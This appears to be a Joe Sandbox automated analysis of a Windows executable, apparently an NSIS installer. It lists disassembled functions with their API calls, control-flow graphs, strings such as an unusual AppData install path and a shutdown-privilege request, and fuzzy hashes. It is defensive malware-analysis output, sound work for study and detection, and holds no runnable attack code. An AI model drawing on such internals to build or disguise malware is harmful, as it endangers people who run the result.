                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371D
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372C
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                  • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\3507071243740008011.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
                                                  • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                  • ExitProcess.KERNEL32 ref: 004038B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                  • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular$C:\Users\user\Desktop$C:\Users\user\Desktop\3507071243740008011.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 2488574733-1263452082
                                                  • Opcode ID: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                  • Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
                                                  • Opcode Fuzzy Hash: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                  • Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E
                                                  Function 00404C62 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 139 404c62-404cae GetDlgItem * 2 140 404cb4-404d48 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->140 141 404ecf-404ed6 139->141 142 404d57-404d5e DeleteObject 140->142 143 404d4a-404d55 SendMessageW 140->143 144 404ed8-404ee8 141->144 145 404eea 141->145 147 404d60-404d68 142->147 143->142 146 404eed-404ef6 144->146 145->146 148 404f01-404f07 146->148 149 404ef8-404efb 146->149 150 404d91-404d95 147->150 151 404d6a-404d6d 147->151 155 404f16-404f1d 148->155 156 404f09-404f10 148->156 149->148 152 404fe5-404fec 149->152 150->147 157 404d97-404dc3 call 404217 * 2 150->157 153 404d72-404d8f call 4062a4 SendMessageW * 2 151->153 154 404d6f 151->154 162 40505d-405065 152->162 163 404fee-404ff4 152->163 153->150 154->153 159 404f92-404f95 155->159 160 404f1f-404f22 155->160 156->152 156->155 196 404dc9-404dcf 157->196 197 404e8e-404ea1 GetWindowLongW SetWindowLongW 157->197 159->152 164 404f97-404fa1 159->164 168 404f24-404f2b 160->168 169 404f2d-404f42 call 404bb0 160->169 166 405067-40506d SendMessageW 162->166 167 40506f-405076 162->167 171 405245-405257 call 40427e 163->171 172 404ffa-405004 163->172 174 404fb1-404fbb 164->174 175 404fa3-404faf SendMessageW 164->175 166->167 176 405078-40507f 167->176 177 4050aa-4050b1 167->177 168->159 168->169 169->159 195 404f44-404f55 169->195 172->171 180 40500a-405019 SendMessageW 172->180 174->152 182 404fbd-404fc7 174->182 175->174 183 405081-405082 ImageList_Destroy 176->183 184 405088-40508f 176->184 187 405207-40520e 177->187 188 4050b7-4050c3 call 4011ef 177->188 180->171 189 40501f-405030 SendMessageW 180->189 191 404fd8-404fe2 182->191 192 404fc9-404fd6 182->192 183->184 193 405091-405092 GlobalFree 184->193 194 405098-4050a4 184->194 187->171 190 405210-405217 187->190 214 4050d3-4050d6 188->214 215 4050c5-4050c8 188->215 199 405032-405038 189->199 200 40503a-40503c 189->200 190->171 202 405219-405243 ShowWindow GetDlgItem ShowWindow 190->202 191->152 192->152 193->194 194->177 195->159 204 404f57-404f59 195->204 205 404dd2-404dd9 196->205 203 404ea7-404eab 197->203 199->200 201 40503d-405056 call 401299 SendMessageW 199->201 200->201 201->162 202->171 208 404ec5-404ecd call 40424c 203->208 209 404ead-404ec0 ShowWindow call 40424c 203->209 210 404f5b-404f62 204->210 211 404f6c 204->211 212 404e6f-404e82 205->212 213 404ddf-404e07 205->213 208->141 209->171 224 404f64-404f66 210->224 225 404f68-404f6a 210->225 228 404f6f-404f8b call 40117d 211->228 212->205 219 404e88-404e8c 212->219 226 404e41-404e43 213->226 227 404e09-404e3f SendMessageW 213->227 220 405117-40513b call 4011ef 214->220 221 4050d8-4050f1 call 4012e2 call 401299 214->221 216 4050ca 215->216 217 4050cb-4050ce call 404c30 215->217 216->217 217->214 219->197 219->203 241 405141 220->241 242 4051dd-4051f1 InvalidateRect 220->242 246 405101-405110 SendMessageW 221->246 247 4050f3-4050f9 221->247 224->228 225->228 229 404e45-404e54 SendMessageW 226->229 230 404e56-404e6c SendMessageW 226->230 227->212 228->159 229->212 230->212 243 405144-40514f 241->243 242->187 245 4051f3-405202 call 404b83 call 404b6b 242->245 248 405151-405160 243->248 249 4051c5-4051d7 243->249 245->187 246->220 253 4050fb 247->253 254 4050fc-4050ff 247->254 251 405162-40516f 248->251 252 405173-405176 248->252 249->242 249->243 251->252 256 405178-40517b 252->256 257 40517d-405186 252->257 253->254 254->246 254->247 259 40518b-4051c3 SendMessageW * 2 256->259 257->259 260 405188 257->260 259->249 260->259
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C7A
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C85
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CE2
                                                  • SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
                                                  • DeleteObject.GDI32(00000000), ref: 00404D58
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404E93
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
                                                  • ShowWindow.USER32(?,00000005), ref: 00404EB2
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405082
                                                  • GlobalFree.KERNEL32(?), ref: 00405092
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E3
                                                  • ShowWindow.USER32(?,00000000), ref: 00405231
                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040523C
                                                  • ShowWindow.USER32(00000000), ref: 00405243
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                  • Instruction ID: ace54df752983209bd77257c2b819bbd2f8b8ae60686516a6448f39b7f2ae2b0
                                                  • Opcode Fuzzy Hash: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                  • Instruction Fuzzy Hash: E50270B0900209EFDB109FA4DD85AAE7BB5FB84314F10817AF650BA2E1D7799D42CF58
                                                  Function 00405990 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 570 405990-4059b6 call 405c5b 573 4059b8-4059ca DeleteFileW 570->573 574 4059cf-4059d6 570->574 575 405b4c-405b50 573->575 576 4059d8-4059da 574->576 577 4059e9-4059f9 call 406282 574->577 578 4059e0-4059e3 576->578 579 405afa-405aff 576->579 583 405a08-405a09 call 405b9f 577->583 584 4059fb-405a06 lstrcatW 577->584 578->577 578->579 579->575 582 405b01-405b04 579->582 585 405b06-405b0c 582->585 586 405b0e-405b16 call 4065c5 582->586 587 405a0e-405a12 583->587 584->587 585->575 586->575 593 405b18-405b2c call 405b53 call 405948 586->593 591 405a14-405a1c 587->591 592 405a1e-405a24 lstrcatW 587->592 591->592 594 405a29-405a45 lstrlenW FindFirstFileW 591->594 592->594 610 405b44-405b47 call 4052e6 593->610 611 405b2e-405b31 593->611 595 405a4b-405a53 594->595 596 405aef-405af3 594->596 598 405a73-405a87 call 406282 595->598 599 405a55-405a5d 595->599 596->579 601 405af5 596->601 612 405a89-405a91 598->612 613 405a9e-405aa9 call 405948 598->613 602 405ad2-405ae2 FindNextFileW 599->602 603 405a5f-405a67 599->603 601->579 602->595 609 405ae8-405ae9 FindClose 602->609 603->598 606 405a69-405a71 603->606 606->598 606->602 609->596 610->575 611->585 614 405b33-405b42 call 4052e6 call 406048 611->614 612->602 615 405a93-405a9c call 405990 612->615 623 405aca-405acd call 4052e6 613->623 624 405aab-405aae 613->624 614->575 615->602 623->602 627 405ab0-405ac0 call 4052e6 call 406048 624->627 628 405ac2-405ac8 624->628 627->602 628->602
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059B9
                                                  • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A01
                                                  • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A24
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A2A
                                                  • FindFirstFileW.KERNELBASE(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A3A
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                  • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040599E
                                                  • "C:\Users\user\Desktop\3507071243740008011.exe", xrefs: 00405990
                                                  • \*.*, xrefs: 004059FB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-3701117409
                                                  • Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                  • Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
                                                  • Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                  • Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E
                                                  Function 004065C5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CA4,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 004065D0
                                                  • FindClose.KERNEL32(00000000), ref: 004065DC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                  • Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
                                                  • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                  • Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698
                                                  Function 00403D3E Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 261 403d3e-403d50 262 403e91-403ea0 261->262 263 403d56-403d5c 261->263 265 403ea2-403eea GetDlgItem * 2 call 404217 SetClassLongW call 40140b 262->265 266 403eef-403f04 262->266 263->262 264 403d62-403d6b 263->264 267 403d80-403d83 264->267 268 403d6d-403d7a SetWindowPos 264->268 265->266 270 403f44-403f49 call 404263 266->270 271 403f06-403f09 266->271 273 403d85-403d97 ShowWindow 267->273 274 403d9d-403da3 267->274 268->267 279 403f4e-403f69 270->279 276 403f0b-403f16 call 401389 271->276 277 403f3c-403f3e 271->277 273->274 280 403da5-403dba DestroyWindow 274->280 281 403dbf-403dc2 274->281 276->277 292 403f18-403f37 SendMessageW 276->292 277->270 278 4041e4 277->278 286 4041e6-4041ed 278->286 284 403f72-403f78 279->284 285 403f6b-403f6d call 40140b 279->285 287 4041c1-4041c7 280->287 289 403dc4-403dd0 SetWindowLongW 281->289 290 403dd5-403ddb 281->290 295 4041a2-4041bb DestroyWindow EndDialog 284->295 296 403f7e-403f89 284->296 285->284 287->278 294 4041c9-4041cf 287->294 289->286 297 403de1-403df2 GetDlgItem 290->297 298 403e7e-403e8c call 40427e 290->298 292->286 294->278 300 4041d1-4041da ShowWindow 294->300 295->287 296->295 301 403f8f-403fdc call 4062a4 call 404217 * 3 GetDlgItem 296->301 302 403e11-403e14 297->302 303 403df4-403e0b SendMessageW IsWindowEnabled 297->303 298->286 300->278 331 403fe6-404022 ShowWindow KiUserCallbackDispatcher call 404239 EnableWindow 301->331 332 403fde-403fe3 301->332 304 403e16-403e17 302->304 305 403e19-403e1c 302->305 303->278 303->302 308 403e47-403e4c call 4041f0 304->308 309 403e2a-403e2f 305->309 310 403e1e-403e24 305->310 308->298 312 403e65-403e78 SendMessageW 309->312 314 403e31-403e37 309->314 310->312 313 403e26-403e28 310->313 312->298 313->308 317 403e39-403e3f call 40140b 314->317 318 403e4e-403e57 call 40140b 314->318 329 403e45 317->329 318->298 327 403e59-403e63 318->327 327->329 329->308 335 404024-404025 331->335 336 404027 331->336 332->331 337 404029-404057 GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404059-40406a SendMessageW 337->338 339 40406c 337->339 340 404072-4040b1 call 40424c call 403d1f call 406282 lstrlenW call 4062a4 SetWindowTextW call 401389 338->340 339->340 340->279 351 4040b7-4040b9 340->351 351->279 352 4040bf-4040c3 351->352 353 4040e2-4040f6 DestroyWindow 352->353 354 4040c5-4040cb 352->354 353->287 356 4040fc-404129 CreateDialogParamW 353->356 354->278 355 4040d1-4040d7 354->355 355->279 357 4040dd 355->357 356->287 358 40412f-404186 call 404217 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->278 358->278 363 404188-4041a0 ShowWindow call 404263 358->363 363->287
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                  • ShowWindow.USER32(?), ref: 00403D97
                                                  • DestroyWindow.USER32 ref: 00403DAB
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                  • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403EB1
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                  • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                  • EnableWindow.USER32(?,?), ref: 0040401A
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
                                                  • EnableMenuItem.USER32(00000000), ref: 00404037
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                  • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                  • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                  • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID:
                                                  • API String ID: 3282139019-0
                                                  • Opcode ID: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                  • Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
                                                  • Opcode Fuzzy Hash: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                  • Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D
                                                  Function 00403990 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 366 403990-4039a8 call 40665c 369 4039aa-4039ba call 4061c9 366->369 370 4039bc-4039f3 call 406150 366->370 379 403a16-403a3f call 403c66 call 405c5b 369->379 375 4039f5-403a06 call 406150 370->375 376 403a0b-403a11 lstrcatW 370->376 375->376 376->379 384 403ad1-403ad9 call 405c5b 379->384 385 403a45-403a4a 379->385 391 403ae7-403b0c LoadImageW 384->391 392 403adb-403ae2 call 4062a4 384->392 385->384 386 403a50-403a78 call 406150 385->386 386->384 393 403a7a-403a7e 386->393 395 403b8d-403b95 call 40140b 391->395 396 403b0e-403b3e RegisterClassW 391->396 392->391 397 403a90-403a9c lstrlenW 393->397 398 403a80-403a8d call 405b80 393->398 410 403b97-403b9a 395->410 411 403b9f-403baa call 403c66 395->411 399 403b44-403b88 SystemParametersInfoW CreateWindowExW 396->399 400 403c5c 396->400 404 403ac4-403acc call 405b53 call 406282 397->404 405 403a9e-403aac lstrcmpiW 397->405 398->397 399->395 403 403c5e-403c65 400->403 404->384 405->404 409 403aae-403ab8 GetFileAttributesW 405->409 414 403aba-403abc 409->414 415 403abe-403abf call 405b9f 409->415 410->403 419 403bb0-403bca ShowWindow call 4065ec 411->419 420 403c33-403c3b call 4053b9 411->420 414->404 414->415 415->404 427 403bd6-403be8 GetClassInfoW 419->427 428 403bcc-403bd1 call 4065ec 419->428 425 403c55-403c57 call 40140b 420->425 426 403c3d-403c43 420->426 425->400 426->410 429 403c49-403c50 call 40140b 426->429 432 403c00-403c23 DialogBoxParamW call 40140b 427->432 433 403bea-403bfa GetClassInfoW RegisterClassW 427->433 428->427 429->410 437 403c28-403c31 call 4038e0 432->437 433->432 437->403
                                                  APIs
                                                    • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                    • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                  • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\3507071243740008011.exe",00000000), ref: 00403A11
                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\pechay\transskribere\jon), ref: 00403AF8
                                                    • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                  • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                  • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                  • RegisterClassW.USER32(00433E80), ref: 00403BFA
